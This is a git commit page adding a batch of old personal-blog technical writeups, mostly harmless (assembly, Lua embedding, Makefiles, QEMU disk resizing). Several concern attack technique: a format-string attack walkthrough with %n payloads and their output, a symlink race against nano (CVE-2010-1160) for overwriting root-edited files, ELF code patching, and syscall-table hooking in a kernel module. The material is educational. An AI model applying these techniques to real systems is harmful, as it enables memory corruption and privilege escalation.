summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorFreeArtMan <dos21h@gmail.com>2021-05-27 21:10:45 +0100
committerFreeArtMan <dos21h@gmail.com>2021-05-27 21:10:45 +0100
commitefa24b220d9633d5d7bfef632b33df180dcb0e74 (patch)
treeac8502acf0116fbbb42a09c6956be70b9a3fc49f
parente63ed8a651e5246f8698a9c1c3e540029710d0e9 (diff)
downloadmd-content-efa24b220d9633d5d7bfef632b33df180dcb0e74.tar.gz
md-content-efa24b220d9633d5d7bfef632b33df180dcb0e74.zip
Update 10 html to md articles
-rw-r--r--md/writeup.md20
-rw-r--r--md/writeup/assembler_calculate_polynomial.md95
-rw-r--r--md/writeup/cve_2010_1160_exploiting_nano.md97
-rw-r--r--md/writeup/elf_rewrite_function.md147
-rw-r--r--md/writeup/elf_text_section.md41
-rw-r--r--md/writeup/embedding_lua_in_c.md71
-rw-r--r--md/writeup/fpu_catch_division_by_zero.md56
-rw-r--r--md/writeup/gimp_plugin.md14
-rw-r--r--md/writeup/hooking_interrupt_descriptor_table.md112
-rw-r--r--md/writeup/linux_format_string_attack.md122
-rw-r--r--md/writeup/linux_local_descriptor_table.md87
-rw-r--r--md/writeup/makefile_tips.md134
-rw-r--r--md/writeup/running_disk_images_in_qemu.md26
13 files changed, 1012 insertions, 10 deletions
diff --git a/md/writeup.md b/md/writeup.md
index 25a0883..806c3e6 100644
--- a/md/writeup.md
+++ b/md/writeup.md
@@ -78,17 +78,17 @@ title: Writeup page
[Blender Scripts](writeup/blender_scripts.md)
[C Bin2Hex](writeup/c_bin2hex.md)
[DWM desktop environment](writeup/dwm_desktop_environment.md)
+[Assembler calculate polynomial](writeup/assembler_calculate_polynomial.md)
+[CVE 2010-1160 Exploiting nano](writeup/cve_2010_1160_exploiting_nano.md)
+[ELF rewrite function](writeup/elf_rewrite_function.md)
+[ELF text section](writeup/elf_text_section.md)
+[Embedding Lua in C](writeup/embedding_lua_in_c.md)
+[FPU catch division by zero](writeup/fpu_catch_division_by_zero.md)
+[Gimp Plugin](writeup/gimp_plugin.md)
+[Hooking interrupt descriptor table](writeup/hooking_interrupt_descriptor_table.md)
+[Linux Format String Attack](writeup/linux_format_string_attack.md)
+[Linux Local Descriptor Table](writeup/linux_local_descriptor_table.md)
-[Assembler calculate polynom](http://archive.main.lv/writeup/assembler_calculate_polynom.html)
-[CVE 2010-1160 Exploiting nano](http://archive.main.lv/writeup/cve_2010-1160_exploiting_nano.html)
-[ELF rewrite function](http://archive.main.lv/writeup/elf_rewrite_function.html)
-[ELF text section](http://archive.main.lv/writeup/elf_text_section.html)
-[Embeding Lua in C](http://archive.main.lv/writeup/embeding_lua_in_c.html)
-[FPU catch division by zero](http://archive.main.lv/writeup/fpu_catch_division_by_zero.html)
-[Gimp Plugin](http://archive.main.lv/writeup/gimp_plugin.html)
-[Hooking interrupt descriptor table](http://archive.main.lv/writeup/hooking_interrupt_descriptor_table.html)
-[Linux Format String Attack 1](http://archive.main.lv/writeup/linux_format_string_attack_1.html)
-[Linux Local Descriptor Table](http://archive.main.lv/writeup/linux_local_descriptor_table.html)
[Linux PC speaker](http://archive.main.lv/writeup/linux_pc_speaker.html)
[Linux ShellCode 1](http://archive.main.lv/writeup/linux_shellcode_1.html)
[Linux keyboard LED](http://archive.main.lv/writeup/linux_keyboard_led.html)
diff --git a/md/writeup/assembler_calculate_polynomial.md b/md/writeup/assembler_calculate_polynomial.md
new file mode 100644
index 0000000..8d680a0
--- /dev/null
+++ b/md/writeup/assembler_calculate_polynomial.md
@@ -0,0 +1,95 @@
+title:Assembler calculate polynomial
+keywords:assembler,c,math,polynomial
+
+# Assembler calculate polynomial
+Calculating polynomial with asm and C
+
+```asm
+format ELF
+section ".text" executable
+public poly
+align 4
+poly:
+a equ dword [ebp+8]
+b equ dword [ebp+12]
+c equ dword [ebp+16]
+x equ dword [ebp+20]
+ ;a*x*x+b*x+c
+ push ebp
+ mov ebp , esp
+ fld c
+ fld x
+ fld b
+ fld x
+ fld a
+ fmulp st1 , st0
+ faddp st1 , st0
+ fmulp st1 , st0
+ faddp st1 , st0
+ pop ebp
+ ret
+```
+
+For calculating polynomial used polish notation
+Wiki
+In other words a*x*x+b*x+c to reduce operations changed to (a*x+b)*x+c
+and then written out operation by priorities [*,+,*,+].
+Compiling this with lines
+
+```
+fasm poly.asm poly.o
+```
+
+```c
+#include <stdio.h>
+extern float poly( float , float , float , float );
+int main()
+{
+ float res = poly( 1.0 , 2.0 , 3.0 , 3.0 );
+ printf( "%f\n" , res );
+ return 0;
+}
+```
+
+
+Compiling this with lines
+```
+gcc -c main.c -o main.o
+```
+Combining
+```
+gcc main.o poly.o -o main
+```
+Update on 06.12.2009
+After running dome C code with FPU calculations and -O2 flag
+
+```asm
+format ELF
+section ".text" executable
+
+public poly
+align 4
+poly:
+a equ dword [ebp+8]
+b equ dword [ebp+12]
+c equ dword [ebp+16]
+x equ dword [ebp+20]
+ ;a*x*x+b*x+c
+ push ebp
+ mov ebp , esp
+
+ fld a
+ fmul x
+ fadd b
+ fmul x
+ fadd c
+
+ pop ebp
+ ret
+```
+
+Now only 5 instructions
+
+
+# Links
+http://en.wikipedia.org/wiki/Polish_notation
diff --git a/md/writeup/cve_2010_1160_exploiting_nano.md b/md/writeup/cve_2010_1160_exploiting_nano.md
new file mode 100644
index 0000000..fa27c0b
--- /dev/null
+++ b/md/writeup/cve_2010_1160_exploiting_nano.md
@@ -0,0 +1,97 @@
+title:CVE 2010-1160 Exploiting nano
+keywords:cve,nano,exploit
+
+# CVE 2010-1160 Exploiting nano
+
+CVE-2010-1160 Nano Changed File Symlink Privilege Escalation
+Usualy if I have to edit some file I am using nano editor. It is almost
+on every distribution and easy and fast to use.
+
+Some time ago i hated vim beacouse of Ctrl-D =] and that way used nano or pico.
+Now I know how to exit from vim :q!. After this bug reported in CVE I was
+excited to check it out in real life. It is first bug that i have fully
+tested. This bug is fixed in newest versions. Testing all nano version
+this bug works on < 2.1.7 versions now on my system is latest nano
+version and I have compiled many < 2.1.7 versions to test this bug.
+
+To get your nano version run:
+```
+$ nano -V
+```
+
+When user is editing file nano don't check if it is edited by some one
+else. When saving file it simply save it and dont check if it was
+modified. If file was changed by some one else then nano will overwrite
+it with his text. But it can be changed to symlink that points to other file.
+How to use it in real life:
+
+1) Open file with nano
+2) Change file or set symlink
+3) Make changes in file and save file in nano
+4) See result in symlinked file
+
+Everything looks like
+```
+$nano text.txt
+``
+
+Now some one do:
+
+```
+$ls -s empty.txt text.txt
+```
+
+Nano save what you save in text.txt
+
+In python it looks like:
+
+```python
+os.remove( "text.txt" )
+open( "empty.txt" , "w" ).close()
+os.symlink( "empty.txt" , "text.txt"
+```
+
+
+If you are root and opening file with owner isnt you.
+Than owner while you editing his file can setsymlink to some
+"/etc/important.conf" and you will overwrite it with some other
+unrelated info. This can make some harm to your system.
+
+How can it be exploited in real life by "small unprivileged user".
+Make some interesting file that root will interested in. Make some
+process that watch nanos running in system.
+If nano opened file is our , symlink it.
+
+1)Detect running nano in system
+2)Check with file is opened
+3)If file is yours make symlink
+
+Script is only for user and dont work if you try to symlink root
+opened nano. It makes all steps as described above. Change script
+variables for your tests:
+
+```
+debug = True
+nano = "nano-2.0.9"
+user = "user"
+sym_path="/home/user/empty.txt"
+```
+
+Tested only with python 2.6.5
+
+Simply be updated or if you using old nano dont open with
+privileged user unprivileged user files. It will save you from this bug.
+
+
+
+## Links
+http://osvdb.org/show/osvdb/63872
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-1160
+http://drosenbe.blogspot.com/2010/03/nano-as-root.html
+http://svn.savannah.gnu.org/viewvc/trunk/nano/ChangeLog?revision=4503&amp;root=nano&amp;view=markup
+
+## Downloads
+nano_bug.tar.gz -
+1KiB - http://archive.main.lv/files/writeup/cve_2010-1160_exploiting_nano/nano_bug.tar.gz
+nano_bug_catch.tar.gz -
+2KiB - http://archive.main.lv/files/writeup/cve_2010-1160_exploiting_nano/nano_bug_catch.tar.gz \ No newline at end of file
diff --git a/md/writeup/elf_rewrite_function.md b/md/writeup/elf_rewrite_function.md
new file mode 100644
index 0000000..b507213
--- /dev/null
+++ b/md/writeup/elf_rewrite_function.md
@@ -0,0 +1,147 @@
+title:ELF rewrite function
+keywords:elf,linux
+
+# ELF rewrite function
+Main idea was to replace compiled in function with some other code and
+run it. In default it is not possible. If you try to write some bytes
+with memcpy() in function location then segfault happens. Why? Programm
+has different segments and they used for different program purpose.Our
+code belongs to readonly-executable segment. And '.text' section.
+We can se it with readelf -S main -l in previous post
+there was program that can be used to make segment writable.After running
+./textwriteble main
+
+now segment with '.text' section becomes writable. When we try
+use memcpy() there is no segfault now.
+Second thing is how to make our function that will
+replace compiled in function position independent for some data inside
+function? First of all we should know our current position.It is in
+eip register. push eip? mov eax, eip? it doesnt work. When we use
+call in stack is saved return address. Now with this small function it
+can be saved in some location
+
+```asm
+get_ip:
+ mov ecx, [esp]
+ ret
+```
+
+At this moment we have converted segment to writable.Have written
+position detection function. If there would be data that will used
+in replaced function than need detect position of that data. For
+example we will use
+
+```
+mov eax, sys_call ;we will use SYS_WRITE = 5
+mov ebx, output_id ; output on terminal is STDOUT 1
+mov ecx, pointer_to_msg
+mov edx, size_of_msg
+int 80h
+```
+
+if this was ordinary situation then define:
+
+```
+msg db "Hello",10
+msg_size = $-msg
+```
+
+and our code becomes
+
+```
+mov eax, SYS_WRITE
+mov ebx, STDOUT
+mov ecx, msg
+mov edx, msg_size
+int 80h
+```
+
+but how to know position of msg if you dont know position where
+function will placed?Use function get_it and you will know current
+instruction position. And it will next instruction after
+
+```
+call get_ip
+```
+
+Our code becomes
+
+```
+call get_ip ;calling and detecting eip
+saved_ip: ;position that will be saved
+jmp get_ip_end ;jump over function
+get_ip:
+ mov ecx, [esp] ;save return eip
+ ret
+get_ip_end:
+mov eax, SYS_WRITE
+mov ebx, STDOUT
+add ecx, msg-saved_ip ;offset of msg
+mov edx, msg_size
+int 80h
+```
+
+ECX has position independent pointer to our text.For testing purposes
+function fun() is filled with
+
+```c
+asm(".byte 0x90, ... ,0x90");
+```
+
+hex 0x90 translates in nop instruction.
+
+nop is No OPeration instruction.
+And function does nothing.Function fun() contains
+
+```
+push ebp
+mov ebp, esp
+start_overwrite_here:
+nop
+...
+...
+...
+nop
+pop ebp
+ret
+```
+
+
+Nop instructions can be replaced with any binary code. There should
+be enough nop instructions for our binary code. There is no check
+on function size that way when overwriting can be problems if binary
+code size is larger then function size.Start function overwriting at
+position (&fun+3) with memcpy()
+
+```
+push ebp
+mov ebp, esp
+start_overwrite_here:
+nop
+...
+...
+...
+nop
+pop ebp
+ret
+```
+
+Wuala function after enabling segment can be overwritten. Here is
+used previous experienced we have mega trick with function replacement.
+Compile:
+```
+make
+```
+
+
+
+## Links
+http://www.unixwiz.net/techtips/win32-callconv-asm.html
+http://www.programmersheaven.com/mb/x86_asm/357735/357735/get-the-value-of-eip/
+http://toku.es/2010/06/text-writable/
+http://main.lv/posts/view/elf-text-section
+http://main.lv/posts/view/linux-assembler-hello-world
+
+## Downloads
+replace_function.zip -
+4KiB - http://archive.main.lv/files/writeup/elf_rewrite_function/replace_function.zip \ No newline at end of file
diff --git a/md/writeup/elf_text_section.md b/md/writeup/elf_text_section.md
new file mode 100644
index 0000000..60b8d58
--- /dev/null
+++ b/md/writeup/elf_text_section.md
@@ -0,0 +1,41 @@
+title:ELF text section
+keywords:elf,linux
+
+# ELF text section
+This code based on .text writable
+
+Find out .text section and make it writable.
+segmentcheck.h contains two functions
+
+```c
+int sec_text_check( FILE* );
+```
+
+check if given file have .text writable section or not. return 0 if
+fasle, 1 if true and -1 if there was some kind error.
+
+```c
+int sec_text_set( FILE* , int );
+```
+set section segment to writable/unwritable depends on second value
+that canbe 0 or 1.
+Code:
+Source includes two tests for both functions.I have not tested both
+functions very whell. That whay there can be some error.I have used
+used that for proving concept. And have checked result with
+```
+test1
+```
+and
+```
+readelf -l simple
+```
+
+
+
+## Links
+http://toku.es/2010/06/text-writable/
+
+## Downloads
+elf_segment.tar.gz -
+26KiB - http://archive.main.lv/files/writeup/elf_text_section/elf_segment.tar.gz
diff --git a/md/writeup/embedding_lua_in_c.md b/md/writeup/embedding_lua_in_c.md
new file mode 100644
index 0000000..ee875ae
--- /dev/null
+++ b/md/writeup/embedding_lua_in_c.md
@@ -0,0 +1,71 @@
+title:Embedding Lua in C
+keywords:lua,c,embed
+
+# Embedding Lua in C
+Bedimming lua in you C programs is can be done in few minutes.
+Many examples is in lua-users.org.
+
+First thing to write is module and then compile everything with lua precompiled lib.
+
+```c
+int module_register(lua_State*);
+void module_print(lua_State*);
+int module_getone(lua_State*);
+
+int module_gc(lua_State*);
+int module_tostring(lua_State*);
+
+static const luaL_reg module_methods[] =
+{
+ //{,(void *)},
+ {"print", (void *)module_print},
+ {"getone", (void *)module_getone},
+ {0, 0}
+};
+
+static const luaL_reg module_meta[] =
+{
+ {"__gc", (void *)module_gc},
+ {"__tostring", (void *)module_tostring},
+ {0, 0}
+};
+```
+
+
+to make printf("%s\n") available in lua
+
+```c
+void module_print( lua_State *L)
+{
+ int argc = lua_gettop(L);
+ int n;
+ for (n=1; n <= argc; n++) printf("%s\n", lua_tostring(L, n));
+}
+```
+
+
+next one function that have return value 1
+
+```c
+int module_getone(lua_State *L)
+{
+ int x=1;
+ lua_pushnumber(L, x);
+ return 1;
+}
+```
+
+
+and easy to compile if needed.
+
+```
+gcc -c module.c
+gcc module.o main.c -o main -llua
+```
+
+## Links
+http://lua-users.org/wiki/SampleCode
+
+## Downloads
+lua_embed.zip -
+2KiB - http://archive.main.lv/files/writeup/embeding_lua_in_c/lua_embed.zip \ No newline at end of file
diff --git a/md/writeup/fpu_catch_division_by_zero.md b/md/writeup/fpu_catch_division_by_zero.md
new file mode 100644
index 0000000..a27cd75
--- /dev/null
+++ b/md/writeup/fpu_catch_division_by_zero.md
@@ -0,0 +1,56 @@
+title:FPU catch division by zero
+keywords:fpu,zero,c,assembler,cpu
+
+# FPU catch division by zero
+There can occure some problems in C onw of them is divison on zero.
+For this we setup system exception handler or signal handler.
+When is division on zero it works.Also for return in main function
+there is used setjmp and longjmp
+
+```c
+void set_exception_handler()
+{
+ int err;
+ fenv.__control_word &= ~FE_ALL_EXCEPT;
+ fenv.__cs_selector &= ~FE_ALL_EXCEPT << 7;
+ fesetenv( &fenv );
+
+ sa.sa_sigaction = &exception_handler;
+ sa.sa_flags = SA_SIGINFO;
+ err = sigaction( SIGFPE, &sa, NULL );
+ if (err != 0)
+ printf("Cannot set FloatingPoint exception handler\n");
+ else
+ printf("[OK] SIGFPE is set\n");
+}
+
+void exception_handler(int i, siginfo_t *s, void *v )
+{
+ if (s->si_signo == SIGFPE)
+ {
+ printf("[SIGFPE] SIGFPE Occure\n");
+ printf("[SIGFPE] Error number: %d\n", s->si_errno);
+ printf("[SIGFPE] Signal code: %d\n", s->si_code);
+ switch (s->si_code)
+ {
+ case FPE_INTDIV:
+ printf("[SIGFPE] Divison by 0\n");
+ longjmp( jmp , 1 );
+ break;
+ }
+ }
+ abort();
+}
+```
+
+Compilation is easy:
+```
+gcc sigfpe.c -o sigfpe -lm
+```
+Now it will no so big problem when some error occur to properly exit
+or make some checks.
+
+
+## Downloads
+exception_in_c.zip -
+2KiB - http://archive.main.lv/files/writeup/fpu_catch_division_by_zero/exception_in_c.zip \ No newline at end of file
diff --git a/md/writeup/gimp_plugin.md b/md/writeup/gimp_plugin.md
new file mode 100644
index 0000000..b0e0570
--- /dev/null
+++ b/md/writeup/gimp_plugin.md
@@ -0,0 +1,14 @@
+title:Gimp Plugin
+keywords:gimp,python,plugin
+
+# Gimp Plugin
+Friend asked to write this plugin because he has tired to process his
+photos with same method many times. Plugin written in Python.
+Copy plugin file in gimp plugin directory. Under linux you should make
+it executable. Start Gimp and plugin works in
+Filters->Automated
+
+
+## Downloads
+hdrate.py.zip -
+1KiB - http://archive.main.lv/files/writeup/gimp_plugin/hdrate.py.zip \ No newline at end of file
diff --git a/md/writeup/hooking_interrupt_descriptor_table.md b/md/writeup/hooking_interrupt_descriptor_table.md
new file mode 100644
index 0000000..a1c8349
--- /dev/null
+++ b/md/writeup/hooking_interrupt_descriptor_table.md
@@ -0,0 +1,112 @@
+title:X11 prototype GUI
+keywords:x11,gui
+
+Hooking interrupt descriptor table
+Hook interrupt descriptor table
+
+Hooking interrupt table is very interesting thing
+with it you can dissallow some operations to be made or watch what
+happening in system. This article is more like review and more tehnical
+description is in link 1
+
+First thing that we should know that it will done trought kernel module
+there is 2 commands for loading and unloading modules
+
+```
+insmod
+```
+
+and
+
+```
+rmmod
+```
+
+there is way how we can check system call addresses and position of syscall
+table
+
+```
+grep sys_call_table /proc/kallsyms
+
+grep system_call /proc/kallsyms
+```
+
+
+also we can use it for detecting our module functions and syscall addreses
+
+```
+grep sys_write /proc/kallsyms
+```
+
+or if we whant check out module functions
+
+```
+grep hook_idt /proc/kallsyms
+```
+
+We will now try to hook sys_mkdir. I usualy using some minimalistic
+windowmanagers but some browsers or other GUIsh programs like such directories
+"Download" or "Desktop" all my directories in ~/ is lowercase and I realy hate
+anoying "Download" and "Desktop" directories that are made without my permission
+and for my lowercase /home directory style is agly. With this hook they will
+be denied to make such thing.
+
+Out kernel module consist of such functions:
+
+```c
+static int __init hook_init(void) //stufff on module init,idt hooking
+static void __exit hook_exit(void) //stuff on module exit, restore idt table
+
+asmlinkage long hooked_mkdir(const char *filename, mode_t mode) //our hook function
+
+//how works this functions you can find in link number 1
+void *get_writable_sct(void *sct_addr)
+void *get_syscall_table(void)
+```
+
+Basic hooked function is:
+
+```c
+asmlinkage long hooked_mkdir(const char *filename, mode_t mode)
+{
+ return mkdir(filename, mode);
+}
+```
+
+but now we need to add check for ("Desktop","Download"). First we need some error
+that will returned when some one whant to make bad directory
+we will use EACCES error.
+
+here is modified functions for out task:
+
+```c
+//hook mkfile command
+asmlinkage long hooked_mkdir(const char *filename, mode_t mode)
+{
+ //it will disallow all files that starts with Desktop&&Download
+ if (((strncmp(filename,"Desktop",7) == 0) && (strlen(filename) == 7)) ||
+ ((strncmp(filename,"Download",8) == 0) && (strlen(filename) == 8)))
+ {
+ printk(KERN_INFO "Mkdir hook\n");
+ return EACCES;
+ }
+ return real_mkdir(filename, mode);
+}
+```
+
+For module compiling:
+
+```
+make
+```
+
+This is tested with kernel version 2.6.38
+
+
+## Links
+http://codenull.net/articles/kmh_en.html
+http://www.gadgetweb.de/linux/40-how-to-hijacking-the-syscall-table-on-latest-26x-kernel-systems.html
+
+## Downloads
+hook_idt.zip -
+5KiB - http://archive.main.lv/files/writeup/hooking_interrupt_descriptor_table/hook_idt.zip
diff --git a/md/writeup/linux_format_string_attack.md b/md/writeup/linux_format_string_attack.md
new file mode 100644
index 0000000..cbffe87
--- /dev/null
+++ b/md/writeup/linux_format_string_attack.md
@@ -0,0 +1,122 @@
+title:X11 Linux Format String Attack
+keywords:linux,c,formatting,printf
+
+# Linux Format String Attack
+Format string attack is attack for C formated strings. Format string
+function is prinrf() there are other functions that
+support format string.C code for bad used printf():
+
+```
+int main( int argc, char **argv )
+{
+ static int i = 0;
+ char text[1000];
+ strcpy(text, argv[1]);
+ printf("%.8x\n",&i);
+ printf("No way it never will works because value of i=%d\n",i);
+ printf( text );
+ printf("\nValue of i=%d\n",i);
+ return 0;
+}
+
+```
+First output is address of static iThan we output values of
+i and call printf() with first argument fo programm.and
+then watching value if i
+
+Run:
+
+```
+./e1 'Halolo'
+```
+
+Output:
+```
+08049674
+No way it never will works because value of i=0
+Halolo
+Value of i=0
+```
+
+Run:
+```
+./e1 'Halolo%s'
+```
+
+Output:
+```
+08049674
+No way it never will works because value of i=0Halolo(null)
+Value of i=0
+```
+
+Run:
+```
+./e1 $'\x74\x96\x04\x08_%x'
+```
+
+Output:
+```
+08049674
+No way it never will works because value of i=0
+t?_0
+Value of i=0
+```
+
+Read about %n in format string:
+
+Run:
+```
+./e1 $'\x74\x96\x04\x08_%x_%n'
+```
+
+Output:
+
+```
+08049674
+No way it never will works because value of i=0
+Segmentation fault
+```
+
+Run:
+
+```
+./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%x_%n'
+```
+
+Output:
+```
+08049674
+No way it never will works because value of i=0
+t?_0_8_40_4_4_
+Value of i=16
+```
+
+Run:
+
+```
+./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%.1201x_%n'
+```
+
+Output:
+```
+08049674
+No way it never will works because value of i=0
+t?_0_8_40_4_000000000000000000000000000000000000000000000000000000000000000000000000000000
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+0000000000000000000000000000000000000000004_
+Value of i=1216
+```
+
+Now you can input almost any value to i
diff --git a/md/writeup/linux_local_descriptor_table.md b/md/writeup/linux_local_descriptor_table.md
new file mode 100644
index 0000000..5a8c571
--- /dev/null
+++ b/md/writeup/linux_local_descriptor_table.md
@@ -0,0 +1,87 @@
+title:Linux Local Descriptor Table
+keywords:linux,ldt,assembler
+
+# Linux Local Descriptor Table
+Is 32bit Intel ELF 0x80**** adreeses is default? nope. You can setup
+your own. Compiler will not see thembut you can do it.
+Setup LDT and you will see it.
+
+```
+use32
+mov dword [0] ,"Hall"
+mov dword [4] ,"Ball"
+mov dword [8] ,"Mall"
+mov dword [12],0x00000000
+```
+
+yes everything starts from 0x0
+
+```
+#include <stdlib.h>
+
+#include <stdio.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <asm/ldt.h>
+
+char new_segment[16];
+
+int main()
+{
+ int r;
+
+ struct user_desc *ldt;
+
+ ldt = (struct user_desc*)malloc(sizeof(struct user_desc));
+
+ ldt->entry_number = 0;
+ ldt->base_addr = ((unsigned long)&new_segment);
+ ldt->limit = 16;
+ ldt->seg_32bit = 0x1;
+ ldt->contents = 0x0;
+ ldt->read_exec_only = 0x0;
+ ldt->limit_in_pages = 0x0;
+ ldt->seg_not_present = 0x0;
+ ldt->useable = 0x1;
+
+ printf("Start\n");
+ r = syscall( __NR_modify_ldt, 1 , ldt , sizeof(struct user_desc) );
+ if ( r == -1 )
+ {
+ printf("Sorry\n");
+ exit( 0 );
+ }
+ asm("pushl %ds");
+ asm("movl $0x7, %eax"); /* 0111: 0-Index 1-Using the LDT table 11-RPL of 3 */
+ asm("movl %eax, %ds");
+ asm(".byte 0xc7,0x5,0x0,0x0,0x0,0x0,0x48,0x61,
+ 0x6c,0x6c,0xc7,0x5,0x4,0x0,0x0,0x0,
+ 0x42,0x61,0x6c,0x6c,0xc7,0x5,0x8,0x0,
+ 0x0,0x0,0x4d,0x61,0x6c,0x6c,0xc7,0x5,
+ 0xc,0x0,0x0,0x0,0x0,0x0,0x0,0x0");
+ asm("popl %ds");
+ printf("End\n");
+
+ printf("Segment [%s]\n",new_segment);
+
+ free( ldt );
+
+ return 0;
+}
+```
+
+```
+asm(".byte ... ") // is code.bin
+```
+
+Compile:
+```
+fasm code.asm code.bin
+
+gcc main.c -o main
+```
+
+
+## Downloads
+linux_ldt.zip -
+2KiB - http://archive.main.lv/files/writeup/linux_local_descriptor_table/linux_ldt.zip \ No newline at end of file
diff --git a/md/writeup/makefile_tips.md b/md/writeup/makefile_tips.md
new file mode 100644
index 0000000..eee99a1
--- /dev/null
+++ b/md/writeup/makefile_tips.md
@@ -0,0 +1,134 @@
+title:Makefile tips
+keywords:makefile
+
+# Makefile tips
+Makefile working tips. Usual simple makefile
+looks like this:
+
+```
+make:
+ gcc main.c -o main
+```
+
+but when your project grows and you use more files it becomes
+like this:
+
+```
+make:
+ gcc -O2 -c file1.c
+ gcc -O2 -c file2.c
+ gcc -O2 -c file3.c
+ gcc -O2 main.c file1.o file2.o file3.o -o main
+```
+
+This is standard growth of file. Its better practice to
+reuse your code, it could applied to your makefile also.
+
+When you have few small project and you want simply copy
+makefile and it works.
+
+## Compiler name
+Usually everyone prefer one compiler. And time to time only
+check if code compiles with other compilers.
+
+```
+CC=gcc
+make:
+ $(CC) -O2 -c file1.c
+ $(CC) -O2 -c file2.c
+ $(CC) -O2 -c file3.c
+ $(CC) -O2 main.c file1.o file2.o file3.o -o main
+```
+
+## Project name
+Every project have unique name and you also would like
+to change it if there is need.
+
+```
+PROJECT=project
+CC=gcc
+make:
+ $(CC) -O2 -c file1.c
+ $(CC) -O2 -c file2.c
+ $(CC) -O2 -c file3.c
+ $(CC) -O2 main.c file1.o file2.o file3.o -o $(PROJECT)
+```
+
+## Compiler flags
+Usual problem is when some compiling flags causes problems
+and you need to change every single entry in file.
+
+```
+PROJECT=project
+CC=gcc
+CFLAGS=-O2
+make:
+ $(CC) $(CFLAGS) -c file1.c
+ $(CC) $(CFLAGS) -c file2.c
+ $(CC) $(CFLAGS) -c file3.c
+ $(CC) $(CFLAGS) main.c file1.o file2.o file3.o -o $(PROJECT)
+```
+
+This 3 variables reduce how number of places that you need
+to edit if something changes.
+
+Next thing is to fix problem when you need to add or remove
+file from project and after that you have manually to edit
+at least 2 lined in makefile.
+
+## Use multiple files
+
+One of they ways how to reduce number of files edited is to add
+new variable where all files is listed:
+
+```
+PROJECT=project
+CC=gcc
+CFLAGS=-O2
+SOURCES=file1.c file2.c file3.c
+OBJECTS=$(SOURCES:.c=.o)
+
+all: $(OBJECTS) $(PROJECT)
+
+$(PROJECT): $(SOURCES) main.c
+ $(CC) $(OBJECTS) $(CFLAGS) main.c -o $(PROJECT)
+
+%.o: %.c
+ $(CC) $(CFLAGS) -c $<
+```
+
+Here was added file auto-matching for *.c files to make them *.o
+
+## Auto matching C files
+
+Last thing to add is auto match all *.c in directory.
+
+```
+PROJECT=project
+CC=gcc
+CFLAGS=-O2
+SOURCES=$(wildcard *.c)
+OBJECTS=$(SOURCES:.c=.o)
+
+all: $(OBJECTS) $(PROJECT)
+
+$(PROJECT): $(SOURCES) main.c
+ $(CC) $(OBJECTS) $(CFLAGS) -o $(PROJECT)
+
+%.o: %.c
+ $(CC) $(CFLAGS) -c $<
+```
+
+Now project makefile can be easily copied and with
+changing only one variable value everything should be OK
+To run any makefile:
+
+```
+make -f makefile_name.mk
+```
+
+
+
+## Downloads
+makefile_tips.zip
+3KiB - http://archive.main.lv/files/writeup/makefile_tips/makefile_tips.zip
diff --git a/md/writeup/running_disk_images_in_qemu.md b/md/writeup/running_disk_images_in_qemu.md
index afdf6fa..3a7c4ea 100644
--- a/md/writeup/running_disk_images_in_qemu.md
+++ b/md/writeup/running_disk_images_in_qemu.md
@@ -151,6 +151,30 @@ Linux Documentation/admin-guide/init.rst for guidance. ]---"
Next step is to figure out what to do with this info, maybe make your own distro?
Create some cool ass crypto drive? Or just have fun.
+## Resize image
+
+When space runs out on the virtual machine, provided images can be resized
+Here is example how to resize image to bigger size and still be able to run it on
+qemu.
+
+Main step that is may harm is fdisk, save disk layout with
+```
+fdisk -l of=raspbian-stretch-lite-20gb.img
+```
+and use it for later reference when partition will be resized.
+
+```
+dd if=2017-08-16-raspbian-stretch-lite.img of=raspbian-stretch-lite-20gb.img seek=0 conv=notrunc
+fdisk -l raspbian-stretch-lite-20gb.img
+#use here fdisk to resize partiions
+sudo kpartx -a raspbian-stretch-lite-20gb.img
+sudo kpartx -d raspbian-stretch-lite-20gb.img
+sudo e2fsck /dev/mapper/loop0p2
+resize2fs /dev/mapper/loop0p2
+```
+
+
+
## References to other articles
[01] [http://main.lv/writeup/compile_linux_kernel.md](http://main.lv/writeup/compile_linux_kernel.md)
@@ -172,3 +196,5 @@ Create some cool ass crypto drive? Or just have fun.
[12] [https://en.wikibooks.org/wiki/QEMU/Images](https://en.wikibooks.org/wiki/QEMU/Images)
[13] [https://wiki.gentoo.org/wiki/QEMU/Linux_guest](https://wiki.gentoo.org/wiki/QEMU/Linux_guest)
[14] [https://www.cs.vu.nl/~herbertb/misc/writingkernels.txt](https://www.cs.vu.nl/~herbertb/misc/writingkernels.txt)
+[15] [https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/storage_administration_guide/s2-disk-storage-parted-resize-part](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/storage_administration_guide/s2-disk-storage-parted-resize-part)
+[16] [https://access.redhat.com/articles/1190213](https://access.redhat.com/articles/1190213) \ No newline at end of file